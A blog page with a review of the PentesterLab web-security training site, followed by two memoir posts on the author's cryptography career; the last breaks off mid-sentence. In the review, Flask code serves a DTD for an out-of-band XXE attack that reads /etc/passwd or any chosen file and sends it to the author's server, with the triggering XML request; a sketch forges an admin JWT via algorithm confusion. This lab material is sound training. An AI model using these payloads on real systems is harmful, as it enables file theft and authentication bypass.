A Review of PentesterLab


After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would spread the word about what a great learning resource it is. If I had to summarise it in one sentence, I would say it is an extremely well written educational site about web application pentesting that caters to all skill levels and makes learning easy at an incredibly affordable price (US$20 per month for pro membership, with no minimum number of months and no annoying auto-renewal at signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. With pro membership, however, you get more content and you avoid the overhead of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do PentesterLab justice is to talk about some of the exercises on the site. So at the end of the blog, I dive into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

A few examples of what you can expect to learn from PentesterLab:

  • An introduction to web security, through any of the Web for Pentesters courses or Essential badge or the Introduction badge or the bootcamp.
  • Advanced penetration testing that often leads to web shells and remote code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), Shellshock, out of band XXE, recent Struts 2 vulnerabilities (CVE-2017-5638), and more.
  • The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.
  • Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, JSON Web Token, and JSON Web Token II.
  • Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.
  • Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

  • Learning some functionality of Burp Suite that I had not known existed. I thought I knew it well before I started, but it turns out there were a number of little things I did not know, often picked up by watching the videos (only available via pro membership).
  • Learning more about various types of encoding and how to work with them in the language of my choice (in my case, Python). The site did not hand me the Python functionality I needed; I was drawn to learn it while trying to solve various challenges. For example, I now know how padding works in base64 (important because not all of the encoded values I got from challenges could be fed directly into Python), and I learned about the very useful urllib.quote. See the sketch after this list.
  • Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.
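To illustrate the base64 point: Python's decoder insists on correct '=' padding, which challenge data often strips. A tiny helper (a sketch; the function name is mine) restores it:

import base64

def b64decode_padded(s):
    # base64 decodes in 4-character groups; restore any stripped '=' padding
    return base64.b64decode(s + '=' * (-len(s) % 4))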

What you should know going in

What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is not to be afraid to try, and there will be times when you need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises, such as Java Deserialization, where you need to run somebody else’s software (in this case, ysoserial). Although that tool comes from very reputable security researchers, being ultra-paranoid, I prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only suggestion I would make to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is the FoxGlove Security blog, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through a YouTube video showing how to perform an attack, frustrated by the presentation? You know, those videos where the author stumbles through typing the attack description (never talking), with bad music in the background? Maybe you had to search a few times before finding a video that is reasonably okay. Well, not here: all the videos are very high quality. The author talks you through everything and has clearly put a lot of thought into explaining the steps to those who do not have experience or background with the attack.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise; other times you have to think a bit. Many videos are spoilers in that they show you how to solve the exercise completely (or almost completely), but it is usually best to try yourself before falling back on the videos: you won’t get more out of it than you put in.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

  • OSCP, which is about infrastructure security as opposed to the web application security of PentesterLab. OSCP is the #1 certification in the industry, is very reasonably priced, and has top quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it: I ran out of time (my wife and kids were beginning to forget who I was). And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all-or-nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality, I’d say PentesterLab material is on par with OSCP.
  • WebGoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I wanted to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do it now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.
  • Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up.  If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.

In the course the author provides an awesome diagram of how it all works, which he explains in detail:

[Diagram: the steps of the out-of-band XXE attack]

(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker sets up his own server (“Attacker’s server” in the diagram) that serves a DTD. The attacker sends malicious XML to the vulnerable server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from the file system (step 4) and send its contents to the attacker’s server (step 5).

So to start out, you need your own web server for the vulnerable application to fetch a DTD from. Here you are a bit on your own as to which server to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small WEBrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has historically been a real pain for me, but I now have it working, so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

from flask import Flask, request  # request is used by the routes below

app = Flask(__name__)

@app.route('/test.dtd')
def testdtd():
    # %p1 reads the target file; %p2 defines an entity e1 that, when
    # resolved, sends the file's contents to my /recorddata endpoint
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).
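For what it's worth, a minimal version of that endpoint could look something like the following sketch (not my original code; it just logs whatever arrives):

@app.route('/recorddata')
def recorddata():
    # the exfiltrated file contents arrive in the query string (step 5)
    app.logger.warning('exfiltrated: %s', request.query_string.decode())
    return 'ok'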

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way too slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: Make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

@app.route('/smart.dtd')
def dtdsmart():
    # take the target file from the query string, so I can try a new
    # file without redeploying (yes, this is itself injectable; see below)
    targetfile = request.args.get('targetfile')
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!
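To tie it together, step 1 of the diagram then looks something like this (the vulnerable endpoint URL here is made up for illustration):

import requests

xml = '''<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM
    "https://contini-heroku-server.com/smart.dtd?targetfile=etc/passwd">
  %remote;
]>
<root>&e1;</root>'''

requests.post('http://vulnerable.example/api/xml', data=xml,
              headers={'Content-Type': 'application/xml'})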

Overall, the course material gives a great description of what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

JSON Web Tokens (JWT) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered with.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.

In practice, it’s not that simple. When I was attempting this, I was completely bothered by not knowing how to treat an RSA key as an HMAC key. I attempted it in Python, fiddling around with a few different ways of feeding in the key to create the signature. None of them worked.
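For illustration, here is roughly the kind of thing I was attempting (a sketch: 'public.pem' and the claim names are placeholders, and the crux is knowing the exact key bytes the server uses):

import base64, hashlib, hmac, json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()

with open('public.pem', 'rb') as f:
    key = f.read()  # but which bytes exactly? that is the whole problem

header = b64url(json.dumps({'typ': 'JWT', 'alg': 'HS256'}).encode())
claims = b64url(json.dumps({'username': 'admin'}).encode())
sig = hmac.new(key, (header + '.' + claims).encode(), hashlib.sha256).digest()
token = header + '.' + claims + '.' + b64url(sig)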

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…


Exercise: ECDSA

According to stats on the site, the ECDSA exercise looks to be the most challenging. I decided to go after it because I was once a cryptographer and was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this. Moreover, ECDSA is in the Capture the flag badge, so there is no guidance: you are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it signs a cookie containing your username with an ECDSA private key. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab either to comment here or on reddit about their experience with the website.

Speak up people!


Why I left cryptography

This blog is a follow-up on my previous blog, How I became a cryptographer, which describes the very long, intense journey I took to get to the state where I could make a living publishing research in cryptography.  A few people have asked why I left, so here I give my reasons.  This blog may be useful to people who are uncertain whether they want to make a similar journey.

Feeling disconnected from the real world

The biggest reason why I left is that I felt cryptography research was more focused on the mathematics than it was on the real world applicability.  As much as I love the mathematics, algorithms, and puzzle solving, I wanted to work on research that mattered.  But the longer I stayed in cryptography, the more disconnected I felt from the real world.

Truthfully, the restrictions I put on myself limited me: I did not want to leave Sydney and I did not want to spend the majority of my time teaching.  Had I not kept those restrictions, I could have had more chances.  With them, the only job that I found to keep me going was to be a PostDoc research fellow.

As a PostDoc research fellow, you are typically paid by a government research grant that may last a couple of years.  When you are paid by such a grant, you need to deliver results that are in agreement with that grant, so that in the future you have evidence that can be used to apply for similar grants to keep you going.  And so the cycle repeats.

If you are really good and daring, you might stray from the research grant topic once in a while to see if you can make an impact somewhere else.  But your time for that is very limited.

I started on research grants involving number theory, then moved to research grants about cryptanalysis.  In this time, I got my top two research results: one influenced the field but unfortunately will never be used in the real world; the other had an important impact on what NIST declares acceptable today.  Also during that time, I did a lot of research that had hardly any relevance to the real world.

While being a PostDoc, I saw a lot of new crypto conferences popping up, and a lot of new crypto researchers publishing at new conferences.  Let’s just say that this was not due to an increase in quality in the field.  Instead, there were more opportunities to publish irrelevant research, which a researcher could use as evidence of making an ‘impact.’

I wanted to know what were the right problems to work on, but the longer I stayed in the field, the less vision I had on where to look.  I was stuck in the cycle, with no vision of what the real world needed.  I simply was not going to get that vision by continuing to do what I was doing.

Disillusionment

When designing a cipher, every cryptographer will tell you the first requirement.  Nobody will look at it unless it follows Kerckhoffs’ principle: the security of the cipher should depend upon the secret key and nothing else.  No secret algorithms.

With the AES selection competition that ran from 1997 to 2000, several cryptographers tried to raise the bar.  Instead of just coming up with a design and relying on others to attack it, the designers should put some effort in themselves to show that it does not trivially fall to common attacks such as linear and differential cryptanalysis.  I myself worked with the RC6 design team (though I was not a designer myself), and we provided extensive analysis of the security of RC6.  We were proud of this.

However, a competitor algorithm went much further.  Not only did the designers attempt various cryptanalytic techniques against their own design, but they also proved (under reasonable assumptions) that the design was resistant to first order linear and differential cryptanalysis.  The proof was via the Wide Trail Strategy.  Their cipher, Rijndael, was the favourite amongst the majority of cryptographers, and ultimately won the AES competition.  Even as a competitor to them, there is no doubt in my mind that the right cipher won.

This was great.  With the turn to the 21st century, we had a new standard of excellence.  Moving the bar beyond the 19th century Kerckhoffs’ principle, we now require designers to put substantial effort into analysing and proving the security of their design before presenting it to us.  Right?

That was my thought, but it is totally wrong.  For two reasons:

  • With the increase in the number of crypto conferences and crypto researchers, there was no possibility of enforcing a standard of excellence.  The doors were (and still are) wide open to publish a low quality design in a low quality conference.
  • Ultimately a fair number of designs get used in the real world long before going through a rigorous analysis and peer review process.

Sure, some designs start getting attention after they have been in use for a while, and by that time we either find problems in them or else fall back to “this algorithm has been in use for a long time and nobody has found problems with it, therefore we can trust it.”  And thus, the science is not maturing.

It is a lot easier to design something than it is to break something.  For every man-hour used to design, it can take one or two orders of magnitude more man-hours to analyse, or maybe even more (depending upon the skills of the designer).  The cryptanalysts simply cannot keep up with the designers, so we instead declare that we will not look at their designs for whatever reason.

I wish cryptography would get beyond Kerckhoffs’ principle.  I wish the effort between design and cryptanalysis was more balanced.  I wish we could give designers more practical advice on what it takes for their cipher to get attention.

I don’t believe that will ever happen.

A lot of labour for little reward

I started out with an attitude like Paul Erdős, but eventually materialism crept in.  It’s a lot easier to be idealistic when you are young and single than it is when you’re beginning to settle down and think about having a family.

As my software skills were dated, I felt very lucky that I could get out when I did.  Fortune brought me to a fantastic printer research company in Sydney that was mainly looking for smart people.  They offered me a good salary, and I was happy to leave cryptography behind.

I was able to maintain a decent salary, but it took me a good 7 years or so before I got to the point where I had strong enough skills in demand so that I could change employment without too much difficulty if I needed to.

Every now and then I get a call from a recruiter about a bank or other large company looking to hire a cryptographer.  They don’t need a researcher, instead somebody who really knows and can advise about cryptography.  I stopped pursuing these potential opportunities: they pay well, but my interests in security go way beyond cryptography, so I don’t want to pigeon-hole myself as a cryptographer only.

What I do today

Now I do more general security work, which includes code review, penetration testing, and architecture/design.  I have strong skills in web security and embedded security.  I like having this breadth of expertise, but I also have a depth of expertise in cryptography, which distinguishes me from most people who do similar work.  The cryptography background is definitely a benefit.  But I am sure glad that I do a lot more than just that.

 

How I became a cryptographer

One of the questions that keeps on appearing over and over in Reddit’s /r/crypto is how to become a cryptographer.  For example this and this and this and this and this.

I often reply to these in comments. But given that the questions keep coming up, I thought it would be good to write up something more complete that I could reference back to. In doing so, I hope I can pass on some valuable tips that I learned the hard way on what it takes to “make it.”

When I say “make it”, I’m referring to being able to make a career as a cryptographer and nothing more. This blog assumes you understand what I mean by “cryptographer”: see Schneier’s article from 1999.  In short, I am showing the path I went down in order to be able to make a living publishing research papers on cryptography, which is not the same as being a practitioner using cryptography.

Often people replying to “how to become a cryptographer” say to get a PhD in cryptography and publish lots of papers. That does not answer the questions of “how do I qualify myself to get a PhD?”, “how do I learn to think like a researcher?”, or “how do I do research?” Nor does it tell you how to do significant research. I hope my blog provides some guidance on these questions.

I myself consider that I made it to the level of mediocrity as a cryptographic researcher. I certainly was no star. But I also started late in the game in terms of developing the way of thinking like a researcher. I believe most of the others had the tendency towards mathematical thinking from a young age. Because of that, I had a lot of catching up to do to compete with many from the field. If you’re reading this blog, then you might be like I was, and thus I hope it provides some helpful tips to you that I had to learn the hard way.

Here are what I believe are the 7 magic ingredients to becoming a cryptographer (in no particular order):

  • You need to be a brilliant mathematician (amended advice given here).

  • You need to be very strong in algorithms, including development and analysis.

  • You need to work your tail off.

  • You need to be creative in problem solving.

  • You need to be passionate about the field you are in.

  • You need to surround yourself with experts in the field.

  • You need a bit of luck (but luck happens when preparation meets opportunity!)

Now I tell my story.

My mischievous youth

I believe that those who have achieved a far-reaching life goal can look back at points from their early ages that contributed to where they are today, so this is where I start.

One trait I had that really contributed to my eventual career was my passion for creative puzzle solving. I personally was not so keen on listening to others (which is not good, by the way): instead I spent many hours trying to find solutions myself. In the early days, this manifested in examples like coming up with my own way to solve the Rubik’s cube, never reading the book.

I guess around age 10, I started using a computer and learning to program it. I spent many hours, not shy to sacrifice a whole weekend, making computer games. By the time I got my first 300 baud dial-up modem, I learned about bulletin board systems (BBSs), where nerds like me developed online social lives. For those who don’t know about BBSs, think of them as a stone-age Facebook.

It didn’t take long before thoughts of mischief on BBSs popped into my head. I spent many hours reading the source code of the main BBS that Commodore 64 users were using and thinking about how I could do stuff that the system was not intended to do. I had a particular interest in destructive actions solely for the purpose of childhood entertainment. My specialty was crashing (i.e. denial of service) BBSs. Yes, I was extremely immature.

By age of 16, I was lucky to have access to a local free-to-use Unix system that I could dial into. It didn’t take long before I was exploring the cool /etc/passwd file. A friend of mine had discovered the algorithm that created the password hashes, and I spent many, many hours with no success in trying to invert that algorithm. This was my first exposure to modern cryptography, though at the time I did not know that I was trying to invert a hash function based upon the Data Encryption Standard (DES).

Being exposed to a Unix system and the C programming language 2 years before starting University gave me a head start. Knowing how to program and hack also made me a good candidate for becoming a cryptographer. But I was lacking what may be the most important ingredient: I was not a brilliant mathematician. Don’t get me wrong: I was decent at mathematics, but by no means brilliant. Maybe I was in the top 15% in my class. That’s nothing compared to most cryptographers who were surely the #1 in their school and beyond. For example, looking at the list of Putnam Fellows (top undergraduate mathematicians in the USA and beyond), one will see several cryptographers on the list.

University learning: changing the way I think

Because I was lucky enough to have my parents pay for my University education in America, I was free to commit a lot of time to learning. I wanted my parents to know that their money was not being wasted, so that drove me to work hard. Extremely hard work.

At the same time, I was going through some phase of not trusting anything. This was back in the Cold War days, when we were told that Russian people are evil and they all wanted to kill us and eat our brains. I was not that gullible, and the skepticism I had developed towards authoritative sources of information ended up being the essential ingredient in changing my way of thinking towards the direction of a researcher.

I did pretty well in my classes, though I often came up with reasons for not believing what they were teaching me, especially physics. I looked to come up with an excuse on why it could be wrong. Can the science of physics be wrong? In order to prove something about reality, you need to make assumptions about reality, and that’s the part that I could always question. Footnote: I no longer take such an extreme skepticism towards everything.

After dismissing physics, next came mathematics. How can I show it is wrong? This is an interesting question, because I, like many people, “learned” mathematics by “memorising the formula” and using it to solve problems. But if I am questioning everything, I can’t take that approach. Instead, I need to disprove the formula. This became a whole way of thinking for me.

When you go to University, you get lectures that you take notes from and a book to read. Which one am I supposed to learn from? I don’t know. I’ll try both.

In the end, I could not make any sense out of my notes, but I could learn from reading the book. The book gives you so much more information than can be packed into a one hour lecture, but the consequence is that you need to spend a lot more time learning. And if you want to disprove the book, you have to spend even more time!

So there I went: reading every single sentence and formula from the book, one-by-one, and trying to disprove it. And absolutely not going to the next one until I am 100% convinced that the sentence or formula is logically correct. To my surprise, I never came across a single thing I could disprove (other than perhaps small mistakes that were easy to correct). And this is what attracted me to mathematics, which ultimately provided me with the thought process I needed to become a cryptographer.

This I believe illustrates an important difference between how most people learn versus how people who end up becoming cryptographers/mathematicians learn. Most people trust the authoritative source. If you want to be a cryptographer, you cannot have that mindset. Instead, you need to question everything and confirm that everything you are being told is true.

Understand why. We cryptographers see new ciphers with miraculous security claims all the time. If we did not question things like we do, then there would be a whole lot of snakeoil used in the real world. When a mathematician reviews a proof, he looks for any way that it may be incorrect, especially where edge cases come into play. Similarly, if you can find any exception to a proof or claim of security for a cipher (especially where edge cases come into play), that could be the key to breaking it. Sometimes finding flaws in security proofs has huge implications, even if the flaw does not translate into an immediate break of the construct.

I later learned that you need to go beyond that: you have to be able to prove the same thing you are reading, not just check that it is true. This of course is an even bigger time commitment, but you eventually learn to figure out the key points of the proof and then reconstruct the rest of it yourself.

When I did homework, I went to the library. Before I started, I would look around and carefully remember anybody I could see around me. After that I would start doing homework, giving full attention to my homework until it was all done. Then, I would look around to see if there is anybody still there that got there before me: my rule was nobody can study harder than me. If I found somebody, it meant that I needed to keep on studying. If there was no homework left to do, find a book to read on my current subject and learn a lot more than what the notes and the other kids in the class are learning.

For some classes, I really enjoyed this. For example, in discrete mathematics / combinatorics, I went to great extents to try to find problems I could not solve. I had mastered the class textbook, which I loved, but I was able to find some very old books in the library that were 100% dedicated to tricky combinatorial problems, and I worked out every one of them until I got to the point that I could solve just about anything thrown at me.

As you can see, I worked my tail off at the University and changed my way of thinking. I did not know it at the time, but this was actually my “catch up” time for getting my mind thinking the way the brilliant mathematicians who end up becoming cryptographers think.

I ended up with a double degree in mathematics and computer science. I did quite well, getting almost all A marks in mathematics and computer science, but not always the same success in other subjects. In my third year of University, I did a graduate level class in cryptography, which I loved and decided I wanted to pursue as a career. I just didn’t know how, but I did know that graduate school was probably the right direction forward.

Graduate school: learning to do research

My parents were generous enough to pay for my undergraduate education and expenses, but now that I was all grown up, it was time for me to cover myself.

I tried very hard to get scholarships to help pay for my graduate school education. But at the end of the day, I was competing with students who already had patents, publications, and the like. I was also up against all-A students and students who had scored perfectly on their GRE. How could I possibly compete? The answer was that I needed to earn my way by being a teaching assistant (TA). Being a TA is a huge time commitment, which took away from the learning that I really wanted to do, but it was the only way I could go forward.

I got accepted to some decent Universities, but top schools like MIT and Stanford were quick to turn me down. Of the ones that accepted me and offered me enough income from TA to pay my way, I decided to go to University of Wisconsin-Milwaukee Computer Science Department, which had a few cryptography professors. I was considered the star student of the time, but in retrospect, this guy turned out to far out-shine me.

I spent two years there taking classes and doing research. My research focus was number theory, particularly integer factorisation. Although I did well in mathematics as an undergrad student, it seems that one really needs to have a lot deeper mathematics background to do innovative research in factoring, so I mainly focused on implementation.

At that time, Arjen Lenstra at Bellcore was in his early days of what would be his long streak of smashing integer factoring records. I loved his research, but I also viewed him as my competitor: if I am going to “make it”, I need to beat him.

Just as an undergrad, I was working my tail off. I was 100% committed to intellectual development. When I wasn’t doing TA duties, class work, or research, I was reading the Usenix groups such as sci.crypt and sci.math, and contributing to discussions. I also spent a lot of time breaking amateur ciphers that were posted on sci.crypt.

After 2 years, I was completing my Masters Degree and was exhausted from all the hard work. I decided that I needed to take a whole summer break just to gather myself. But fortune had another plan for me.

I received an email from Arjen Lenstra. This was not long after he had factored RSA-129, which got international press. Arjen was looking for a summer intern to work with at Bellcore.

There I was: exhausted, feeling as if I had spent 6 years fighting Mike Tyson, needing a rest, and then getting an email from my “competitor” asking if I wanted to work with him. What was I to do?

Thankfully, my parents and friends set my mind straight. I wanted to turn it down, but they said I would be absolutely crazy to do so, and they were right. I took the opportunity, which turned out to be the single most important decision of my career. Let me be 100% unambiguous: if I had declined this opportunity, I would never have made it as a researcher. Luck definitely played a role for me.

One of the most important things I learned from Arjen is that when I develop new algorithms, I need to prove that they are correct. This is obvious to a researcher, but it was not obvious to me. I had ways of solving problems that he wanted me to work on, but he said he wanted proofs before I went ahead and implemented them. And so I did.

In all honesty, I didn’t feel like I did great working for him that internship, but I had enough background in what he wanted me to work on to make me succeed. As I said, I was exhausted from all the studying and TA duties, so I did not commit 100% like I had done for University study. I also had planned to take my time off to gather myself at the end of the 3 month internship.

To my surprise, as the internship came to an end, he asked what I was doing after it. I said “nothing.” He then asked why not stay working there until the end of the year. Hmmm, the pay is good, the experience is great, and what he wants me to work on is exactly what I want to work on. I’ll take it.

I spent the next approximately 5 months working on a project with Arjen that really excited me. We were using the MasPar massively parallel computer to implement fast linear algebra algorithms to solve factoring matrices. We ended up writing a research paper on it, but it never got submitted anywhere. This was my fault: I was too busy to finish it off, and I thought it was research that nobody would be interested in. I was wrong.

During that time, I got back into the mindset of a researcher and I seem to have forgotten that I needed time to gather myself. I decided that having a Masters in Computer Science was not really what I needed: instead I needed an advanced degree in Mathematics. And I was 100% certain that I wanted to do that working for Carl Pomerance at the University of Georgia.

Carl was a well known star in Number Theory. He, along with Andrew Granville and Red Alford, had just completed a proof that there are infinitely many Carmichael numbers, which excited me. Carl was also well known for factoring. I didn’t realise it at the time, but one of the reasons why everybody knew Carl is that he wrote his research so well that even an idiot like me could understand it. Not many mathematicians have that skill.

I thought I would be able to comfortably get into the University of Georgia, but I was wrong. On paper, I was borderline to get into their Masters program, and especially, getting a TA job was going to be tough.

Completely out of character for me, I decided to make a 10 hour drive to Georgia to meet with Carl and other people at the University, and convince them that they should accept me as a graduate student. I wonder to this day if they ever had anybody else approach them like that. I went there, talked to a number of professors, and told them who I was and what I wanted to do. If nothing else, they saw the passion for mathematics and research in my eyes, and combining that with a letter of recommendation from Arjen, they decided to give me a shot. I got accepted and was offered a TA position.

Truthfully, I don’t know if they really believed that I would make it, and rightfully so. I did not know about the level of competition I was going to find at this University, but as before, I was able to make up the difference by extremely hard work. This was also the time that I learned that checking the proofs is not enough: you need to be able to prove everything in the book yourself.

I surprised a lot of people and eventually they accepted me as a PhD student. Carl Pomerance and others really believed in me. But eventually, 8 years of intense University studying had clobbered me. I was beat and financially in debt, and I really needed a break. Carl tried hard to convince me to go through with the PhD, but I just couldn’t find the drive any longer. I bailed out with a Masters degree.

At this point I had a double Bachelors degree in Mathematics and Computer Science, a Masters degree in computer science, a Masters degree in Mathematics, and letters of recommendations from big shots Arjen Lenstra (pretty much the top computational number theorist ever) and Carl Pomerance (big shot analytical number theorist). Suddenly, how I looked on paper was representative of how good I considered myself to be. And with that, I got a position in industry as a research associate that I believe I deserved, working for RSA Labs at RSA Data Security.

The only catch is that even though I did research to get my Masters degrees, my research was not particularly innovative. So I could not call myself a researcher yet.

Getting my first publications

It took me a bit of luck to upgrade my skills and get myself where I needed to be in University and graduate school, but at this point I believe that I truly was the best person for the position I took at RSA Labs. Having said that, what an amazing opportunity it was to see minds like Ron Rivest and Yiqun Lisa Yin in action.

It happened to be a convenient time to work there, as there was a call for an Advanced Encryption Standard and RSA Labs had one of the top candidates: RC6.

Ultimately, I made no contribution to the final design of RC6, but I was able to contribute to the analysis. My tendency to disbelieve anything that lacked a proof was instrumental in my attempts to check the heuristic analyses that the team did to understand the security. It turned out that the heuristic analyses didn’t hold for some simplified variants of RC6, which resulted in my first publication, with Ronald Rivest, Matt Robshaw, and Yiqun Lisa Yin as coauthors.

It was not that difficult to get this result.  I wrote a program to try to verify heuristic claims.  I saw that those claims were not always correct.  I spent time understanding why the claims do not work via debugging and analysis, and worked with my colleagues to develop the analysis further.  Then formal proofs, write-up, and publication.

I did a fair amount of work with Yiqun Lisa Yin, who helped me get a few other publications coauthored with her. She is a brilliant mind and knew where the research community was going. She had the great ideas and I helped where I could.

Despite my success in getting publications, I felt: (1) the results are not significant enough to make me feel as I have “made it” as a researcher, and (2) except in the one publication above, the main ideas were largely coming from other people rather than myself.

Getting significant research results

The position at RSA Labs lasted about 2 years, at which time the company that bought out RSA decided that research in cryptography was not so important, and cut off the West coast research arm.

For a number of years after that, I went back and forth between academia and industry, seeking another position like the one I had at RSA Labs. I wanted to do research but also develop software. It turned out that such positions are extremely rare.

I had a couple of positions that are normally for post-doctoral researchers, despite not having a doctorate. One of those was at Macquarie University, with the aim of doing research in Number Theory.

Unfortunately, I did not have a strong enough background to do significant research in Number Theory, or at least I didn’t think so. I did get a few crypto publications during this time, but I felt they were fairly small results. Towards the end of the appointment, I was ready to give up.

(Side note: I actually did my PhD while at the same time holding this PostDoc position).

It was my office-mate, Ron Steinfeld, who suggested that we look at hash functions. He had some ideas that I was happy to work on with him.

Somehow, I got distracted and started thinking about a hash function built by multiplying small primes together. I wrote a simple equation on the whiteboard and looked at it. I then noticed that if there is a collision, something remarkable happens.

